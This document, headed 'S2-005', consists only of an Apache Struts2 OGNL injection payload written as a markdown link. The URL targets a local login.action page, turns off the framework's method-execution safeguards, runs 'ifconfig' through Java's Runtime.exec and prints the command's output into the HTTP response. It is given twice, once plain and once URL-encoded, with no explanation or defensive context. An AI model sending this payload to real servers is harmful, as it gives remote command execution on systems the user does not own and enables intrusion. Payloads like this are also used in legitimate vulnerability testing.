S2-005

[http://localhost:1111/login.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'ifconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla](http://localhost:1111/login.action?\('%5Cu0023context%5B%5C'xwork.MethodAccessor.denyMethodExecution%5C'%5D%5Cu003dfalse'\)\(bla\)\(bla\)&\('%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue'\)\(bla\)\(bla\)&\('%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET'\)\(kxlzx\)\(kxlzx\)&\('%5Cu0023mycmd%5Cu003d%5C'ifconfig%5C''\)\(bla\)\(bla\)&\('%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime\(\).exec\(%5Cu0023mycmd\)'\)\(bla\)\(bla\)&\(A\)\(\('%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream\(%5Cu0023myret.getInputStream\(\)\)'\)\(bla\)\)&\(B\)\(\('%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D'\)\(bla\)\)&\(C\)\(\('%5Cu0023mydat.readFully\(%5Cu0023myres\)'\)\(bla\)\)&\(D\)\(\('%5Cu0023mystr%5Cu003dnew%5C40java.lang.String\(%5Cu0023myres\)'\)\(bla\)\)&\('%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse\(\)'\)\(bla\)\(bla\)&\(E\)\(\('%5Cu0023myout.getWriter\(\).println\(%5Cu0023mystr\)'\)\(bla)))